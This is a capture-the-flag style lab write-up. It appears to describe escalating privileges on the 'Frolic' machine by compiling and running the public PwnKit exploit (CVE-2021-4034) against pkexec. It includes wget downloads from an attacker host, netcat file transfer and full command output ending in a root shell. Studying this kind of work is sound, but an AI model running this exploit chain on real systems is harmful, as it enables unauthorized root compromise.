InfoSec LAB

Frolic_Privilege_Escalation_2

Created: 4 min read

CVE-2021-4034

peas discovered that the target system is vulnerable to cve-2021-4034

a vulnerability, which was classified as critical, has been found in polkit (version now known). This issue affects some unknown processing of the file /usr/bin/pkexec. The manipulation with an unknown input leads to a access control vulnerability. Using CWE to declare the problem leads to CWE-284. The software does not restrict or incorrectly restricts access to a resource from an unauthorized actor. Impacted is confidentiality, integrity, and availability.

exploit (pwnkit)

Exploit available online

www-data@frolic:~$ make ; gcc ;cc
make: *** No targets specified and no makefile found.  Stop.
gcc: fatal error: no input files
compilation terminated.
cc: fatal error: no input files
compilation terminated.

Since the target system already has compilers installed, the exploit can be compiled locally

┌──(kali㉿kali)-[~/archive/htb/labs/frolic]
└─$ git clone https://github.com/berdav/CVE-2021-4034.git ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56
Receiving objects: 100% (92/92), 22.71 KiB | 3.78 MiB/s, done.
Resolving deltas: 100% (44/44), done.

Downloading the exploit package

Exploitation (Failed)

www-data@frolic:/dev/shm$ wget -q http://10.10.16.8/CVE-2021-4034.tar.gz ; tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034

Delivery complete

www-data@frolic:/dev/shm/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc: error trying to exec 'cc1': execvp: No such file or directory
makefile:21: recipe for target 'pwnkit.so' failed
make: *** [pwnkit.so] Error 1

compilation failed due to cc1 being missing This would mean that the exploit must be compiled remotely

Docker Exploit Development

The target system is a 32-bit i686 system There is a Docker image available for Ubuntu 16.04 in i386 architecture, which is a bit older than i686, but it should run just fine since it’s backword-compatible

┌──(kali㉿kali)-[~/archive/htb/labs/frolic]
└─$ docker run -it --entrypoint "/bin/bash" --name frolic i386/ubuntu:16.04
 
root@48e042037aeb:/# ldd --version
ldd (Ubuntu GLIBC 2.23-0ubuntu11.3) 2.23
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

Starting a Docker container and confirming the glibc version

root@48e042037aeb:/# apt update -y ; apt install -y net-tools netcat nano gcc gcc-multilib make git ; cd root

Installing necessary packages

root@48e042037aeb:~# git clone https://github.com/berdav/CVE-2021-4034.git ; cd CVE-2021-4034 ; make ; cd .. ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56
Unpacking objects: 100% (92/92), done.
Checking connectivity... done.
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.

Downloading, compiling and packaging the exploit

root@48e042037aeb:~# nc 10.10.10.111 2222 < CVE-2021-4034.tar.gz 
www-data@frolic:/dev/shm$ nc -nlvp 2222 > CVE-2021-4034.tar.gz
Listening on [0.0.0.0] (family 0, port 2222)
Connection from [10.10.16.8] port 2222 [tcp/*] accepted (family 2, sport 35272)

Delivery complete

Exploitation

www-data@frolic:/dev/shm$ tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034

Unpacking

www-data@frolic:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
./cve-2021-4034
# whoami
whoami
root
# hostname
hostname
frolic
# ifconfig
ifconfig
ens33     link encap:Ethernet  HWaddr 00:50:56:b9:eb:ab  
          inet addr:10.10.10.111  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:feb9:ebab/64 Scope:Link
          inet6 addr: dead:beef::250:56ff:feb9:ebab/64 Scope:Global
          up broadcast running multicast  mtu:1500  Metric:1
          rx packets:1238763 errors:354 dropped:1132 overruns:0 frame:0
          tx packets:1225747 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          rx bytes:198656960 (198.6 MB)  TX bytes:414417041 (414.4 MB)
          interrupt:19 Base address:0x2000 
 
lo        link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          up loopback running  mtu:65536  Metric:1
          rx packets:138990 errors:0 dropped:0 overruns:0 frame:0
          tx packets:138990 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          rx bytes:10284882 (10.2 MB)  TX bytes:10284882 (10.2 MB)

System Level Compromise

┌──(kali㉿kali)-[~/archive/htb/labs/frolic]
└─$ docker rm frolic
frolic

Interactive Graph View

Backlinks